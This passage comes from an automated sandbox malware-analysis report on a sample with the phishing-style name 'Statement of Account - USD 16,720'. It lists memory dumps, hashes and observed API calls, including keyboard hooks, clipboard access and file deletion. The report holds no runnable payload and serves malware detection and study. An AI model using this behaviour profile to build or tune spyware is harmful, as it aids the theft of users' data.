                                                  • Source File: 00000000.00000002.2016234186.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15cd000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2016234186.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15cd000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2016267090.00000000015DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015DD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15dd000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2016267090.00000000015DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015DD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15dd000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2016234186.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15cd000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2016234186.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15cd000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2017351385.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1630000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:

                                                  Execution Graph

                                                  Execution Coverage:13.2%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:242
                                                  Total number of Limit Nodes:23

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-1273862796
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-3723351465

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q
                                                  • API String ID: 0-127220927

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: XPbq$\Obq
                                                  • API String ID: 0-409418754
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $
                                                  • API String ID: 0-3993045852
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 06756ECE
                                                  • GetCurrentThread.KERNEL32 ref: 06756F0B
                                                  • GetCurrentProcess.KERNEL32 ref: 06756F48
                                                  • GetCurrentThreadId.KERNEL32 ref: 06756FA1
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 06756ECE
                                                  • GetCurrentThread.KERNEL32 ref: 06756F0B
                                                  • GetCurrentProcess.KERNEL32 ref: 06756F48
                                                  • GetCurrentThreadId.KERNEL32 ref: 06756FA1
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q
                                                  • API String ID: 0-858218434

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q
                                                  • API String ID: 0-182748909

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fbq$XPbq$\Obq
                                                  • API String ID: 0-4057264190

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q
                                                  • API String ID: 0-127220927

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fbq$XPbq
                                                  • API String ID: 0-2292610095

                                                  Control-flow Graph

                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0675356A
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0

                                                  Control-flow Graph

                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 00F0F7DF
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4485627216.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_f00000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0

                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0675356A
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: 0cd05af33e740afecde6d6f7b32ae1b1fca1af3995402ec6394ef62c1f6718f3
                                                  • Instruction ID: 761764aee899e62e31a82c56fd6217b3a8db697ca16f4db365c28cfa137bd6b0
                                                  • Opcode Fuzzy Hash: 0cd05af33e740afecde6d6f7b32ae1b1fca1af3995402ec6394ef62c1f6718f3
                                                  • Instruction Fuzzy Hash: 9F51C4B1D00309DFDB15CFA9C884AEEBBF5BF48350F25816AE919AB210D7759885CF90
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0675356A
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: 5eb815a682686d8b53742bb9cccc9dd20ea2e07912839ab66a2e07a82235ae3e
                                                  • Instruction ID: 28c6e2b4a4162ef14f91a17353ea98ca40ddc5416afd79d8a6dad12e6b99aa46
                                                  • Opcode Fuzzy Hash: 5eb815a682686d8b53742bb9cccc9dd20ea2e07912839ab66a2e07a82235ae3e
                                                  • Instruction Fuzzy Hash: 6E41B4B1D00309DFDB14CFAAC884ADEBBB5BF48354F25816AE819AB210D7759985CF90
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 06757FE9
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID:
                                                  • API String ID: 2714655100-0
                                                  • Opcode ID: 624c6202b3bdf8aef436ac7fc7c3eb1bc882d1b5439c28f065cc4b352a32be49
                                                  • Instruction ID: 6dab9c44c703b322376f2ddbef1a7a0e8987fc82cd81f6532d0986543b895fe0
                                                  • Opcode Fuzzy Hash: 624c6202b3bdf8aef436ac7fc7c3eb1bc882d1b5439c28f065cc4b352a32be49
                                                  • Instruction Fuzzy Hash: D3415CB4900309CFDB54CF99C848AAABBF5FF88314F25C499D919AB321D375A841CFA0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: Clipboard
                                                  • String ID:
                                                  • API String ID: 220874293-0
                                                  • Opcode ID: 9bc44acf7cd01c0ada71640a767754083550a5b373268bcb68640e52ee11b3c4
                                                  • Instruction ID: 2fb0a5a4ab9abb2c9ae36d63d94667c0451890602008b87b806584c9aff295de
                                                  • Opcode Fuzzy Hash: 9bc44acf7cd01c0ada71640a767754083550a5b373268bcb68640e52ee11b3c4
                                                  • Instruction Fuzzy Hash: 873103B0D01359DFDB54CF99C984BDEBBF5AF48304F24805AE404AB290D7B86945CB95
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: Clipboard
                                                  • String ID:
                                                  • API String ID: 220874293-0
                                                  • Opcode ID: 61e31bf39750a47ee665f7904ffc11b08902c907822d775ebd776797ab0c09c1
                                                  • Instruction ID: ecce22c7fae3450d01a4ee524f083bc920bd8155b2d6cf3a9dd2d838be3a19a8
                                                  • Opcode Fuzzy Hash: 61e31bf39750a47ee665f7904ffc11b08902c907822d775ebd776797ab0c09c1
                                                  • Instruction Fuzzy Hash: B23112B0D01358DFDB54CF99C984B9DBBF5AF48304F20805AE404AB290D7B86944CB95
                                                  APIs
                                                  • MoveFileA.KERNEL32(?,00000000,?,?), ref: 00F086D0
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4485627216.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_f00000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: FileMove
                                                  • String ID:
                                                  • API String ID: 3562171763-0
                                                  • Opcode ID: 997530ccf7b9787240f3dccf2d6fca2b8eae7197184f6d5cd867a6a7d088adcb
                                                  • Instruction ID: f8fcf87ec50a55682460c3c101cefd7dcfdc9c0ed39e8e5a231226e8053faa90
                                                  • Opcode Fuzzy Hash: 997530ccf7b9787240f3dccf2d6fca2b8eae7197184f6d5cd867a6a7d088adcb
                                                  • Instruction Fuzzy Hash: 9B2125B6C012089FCB10CF9AD884ADEFBF5FF88310F24805AE858AB245D7756945DFA4
                                                  APIs
                                                  • MoveFileA.KERNEL32(?,00000000,?,?), ref: 00F086D0
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4485627216.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_f00000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: FileMove
                                                  • String ID:
                                                  • API String ID: 3562171763-0
                                                  • Opcode ID: 5fd9ead2ec28ae9a7311ea28446744a4d71e63ae8c825b9a7a095c15f5cc7a28
                                                  • Instruction ID: dd34487c711d3580f5036e667e3a3c8780e63f4401fa3cdfa3fd54e4b9015525
                                                  • Opcode Fuzzy Hash: 5fd9ead2ec28ae9a7311ea28446744a4d71e63ae8c825b9a7a095c15f5cc7a28
                                                  • Instruction Fuzzy Hash: 952127B6C012089FCB10CF99D884ADEFBF5FB88310F14805AE958AB245C775A945DBA4
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 06752416
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 6de8af927df8594bcedfcba6e0daa71471450fc45e4d59e037da0dd1f5262679
                                                  • Instruction ID: 52e6f5b1b77e67e3452f89bcbb147aa2e9b1d85e0914d6d25d92c21a3e1c3b86
                                                  • Opcode Fuzzy Hash: 6de8af927df8594bcedfcba6e0daa71471450fc45e4d59e037da0dd1f5262679
                                                  • Instruction Fuzzy Hash: 27214CB1C053888FDB15CFAAC44469EBFF4EF8A314F15819AC458AB252C379A546CFA1
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0675711F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 18d63245f96ac0fcf2f4fabe1eb5379a221b4dcfdfdb959bf0c3fde94bca1a76
                                                  • Instruction ID: 840015d003cea5a2ea1f5792f69cfa1a6ac0892f83714431becbd713f07aebeb
                                                  • Opcode Fuzzy Hash: 18d63245f96ac0fcf2f4fabe1eb5379a221b4dcfdfdb959bf0c3fde94bca1a76
                                                  • Instruction Fuzzy Hash: DC21E5B5900249DFDB10CFAAD984AEEFFF5FB48310F14845AE958A3210D379A944CFA5
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,0675823D), ref: 067582C7
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: 50240b738e37facd6017dfd915e64f003065f6d706bdd6c8d6532407056d9a47
                                                  • Instruction ID: b5a162d6ed93158296c7820e7dad53a03c1204d1c39afc0885214aa910ced375
                                                  • Opcode Fuzzy Hash: 50240b738e37facd6017dfd915e64f003065f6d706bdd6c8d6532407056d9a47
                                                  • Instruction Fuzzy Hash: F4219AB1C043988FCB11DFA9C854AEFBFF4EF49310F1044AAD459A7251C378A944CBA5
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0675711F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: d48c9364543e286aad10bb9460df7a141685b1c35718e224675f5fc1e9fb61f7
                                                  • Instruction ID: 13bba0b245edcfa3ecec3f072912bbcc24b6b1019b589fdfd19f674b8c4feb3c
                                                  • Opcode Fuzzy Hash: d48c9364543e286aad10bb9460df7a141685b1c35718e224675f5fc1e9fb61f7
                                                  • Instruction Fuzzy Hash: D921C6B59002499FDB10CFAAD984ADEFBF5FB48310F14845AE914A3350D379A944CFA5
                                                  APIs
                                                  • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0675A943
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: HookWindows
                                                  • String ID:
                                                  • API String ID: 2559412058-0
                                                  • Opcode ID: d465a6dd2b41cf7e1ba9721f0ecd1fb77c9eb65f16f3cf94d523037dc0108386
                                                  • Instruction ID: 0b340a751160e642eadbb8e0f30eb2abb8c1a8898f0722e08b0795198fe8db28
                                                  • Opcode Fuzzy Hash: d465a6dd2b41cf7e1ba9721f0ecd1fb77c9eb65f16f3cf94d523037dc0108386
                                                  • Instruction Fuzzy Hash: E82134B5D002098FCB54DFAAC844BEEBBF5FB88310F10842AE459A7250C779A944CFA1
                                                  APIs
                                                  • DeleteFileW.KERNEL32(00000000), ref: 00F080D8
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4485627216.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_f00000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: DeleteFile
                                                  • String ID:
                                                  • API String ID: 4033686569-0
                                                  • Opcode ID: 74fba97dd7960a09ce2334e1b3953431222e69b05640c81e2fb65ec412a02115
                                                  • Instruction ID: 7d664c992147e6ee4b63da559e6d877b4bfec47d3e37af28e648570ffea93f0f
                                                  • Opcode Fuzzy Hash: 74fba97dd7960a09ce2334e1b3953431222e69b05640c81e2fb65ec412a02115
                                                  • Instruction Fuzzy Hash: 3C2144B1C006199BCB10DF9AC4447AEFBF4EF08320F10812AD818A7240D778A945DFE1
                                                  APIs
                                                  • DeleteFileW.KERNEL32(00000000), ref: 00F080D8
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4485627216.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_f00000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: DeleteFile
                                                  • String ID:
                                                  • API String ID: 4033686569-0
                                                  • Opcode ID: 51a6d2d49171ffe405953d73f1c337798df0d6155164871e9d7963e63e88c002
                                                  • Instruction ID: b1b91b464e638f31f1edcf42d7d7c80afa0fc07a9460a898fb13b9b8470a40c5
                                                  • Opcode Fuzzy Hash: 51a6d2d49171ffe405953d73f1c337798df0d6155164871e9d7963e63e88c002
                                                  • Instruction Fuzzy Hash: 1D2142B1C0061A8BCB10CFAAC5447AEFBF0AF08320F14812AD859B7241D738A945CFA4
                                                  APIs
                                                  • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0675A943
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: HookWindows
                                                  • String ID:
                                                  • API String ID: 2559412058-0
                                                  • Opcode ID: beb1662e6a97d14ecf1921665b53bd89e7bd816cf9b1a7613f7aa165202a4d4f
                                                  • Instruction ID: 923065fe1018624681ec5f383d5fcc482e06ffbab02f1b29ed83a6eb92c82de7
                                                  • Opcode Fuzzy Hash: beb1662e6a97d14ecf1921665b53bd89e7bd816cf9b1a7613f7aa165202a4d4f
                                                  • Instruction Fuzzy Hash: 012102B5D002198FCB54DF9AC844BEEBBF5BB88310F10842AE459A7250C779A944CFA1
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 00F0F7DF
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4485627216.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_f00000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 97c764ec7d897a7cfe44095264a528d2a1f36f189bb79c3e933e653f70365bfd
                                                  • Instruction ID: f8bfaccc66089a2927e9e2cb92789f4530d6b1efa47aa519648c77b0aed26852
                                                  • Opcode Fuzzy Hash: 97c764ec7d897a7cfe44095264a528d2a1f36f189bb79c3e933e653f70365bfd
                                                  • Instruction Fuzzy Hash: 2E11E2B1C0065A9BCB10DF9AC544A9EFBF4AF48320F14816AD918A7240D778A944CFE5
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 06752416
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 563d27ea3dc9b998dc81a9e7305bbc3e674f53cb22b4eae9e64de1e0f83ae72b
                                                  • Instruction ID: 844652ef437bcc9b38c3b5d2364c8dbf277ea3927ba158cc0004e6f4d5e83896
                                                  • Opcode Fuzzy Hash: 563d27ea3dc9b998dc81a9e7305bbc3e674f53cb22b4eae9e64de1e0f83ae72b
                                                  • Instruction Fuzzy Hash: 031134B5C003488FDB10DF9AC448ADEFBF4EB48310F11806AD829B7201C379A945CFA1
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 06758B85
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  • Opcode ID: b18a817a56e4d23af9c8790c026599912d876ec108dd912882cf539c015f739c
                                                  • Instruction ID: 30aa54c0a3f23b0d60c6d1c09ecf634c071f24a3b53f97afa66594cb88308e79
                                                  • Opcode Fuzzy Hash: b18a817a56e4d23af9c8790c026599912d876ec108dd912882cf539c015f739c
                                                  • Instruction Fuzzy Hash: 8B1103B5804358CFDB20EF9AC448B9EBBF8EB48324F108459D519A7610C378A944CFA5
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,0675823D), ref: 067582C7
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: 43f06c84c0828fa2b750f6cf5c76aa1dd2e4ad749f92306d89b2ebc5d59fc210
                                                  • Instruction ID: 4c8368fe9e1331ac880f1717a1078abc8d44c1fc7c12ace979ea48b351d06df0
                                                  • Opcode Fuzzy Hash: 43f06c84c0828fa2b750f6cf5c76aa1dd2e4ad749f92306d89b2ebc5d59fc210
                                                  • Instruction Fuzzy Hash: 781103B5804658CFCB50DF9AD448BAEBFF8EB48314F20845AD919A7240C778A944CFA5
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 06758B85
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499130047.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6750000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  • Opcode ID: 9d8b523e801efe350400af0ad8d5fd8d5371a04a969302a7c40566a6cca92801
                                                  • Instruction ID: b8ec6b8e4b512059b5e66942d10997e4dc79e309dd846b8adf020a757c7f8f99
                                                  • Opcode Fuzzy Hash: 9d8b523e801efe350400af0ad8d5fd8d5371a04a969302a7c40566a6cca92801
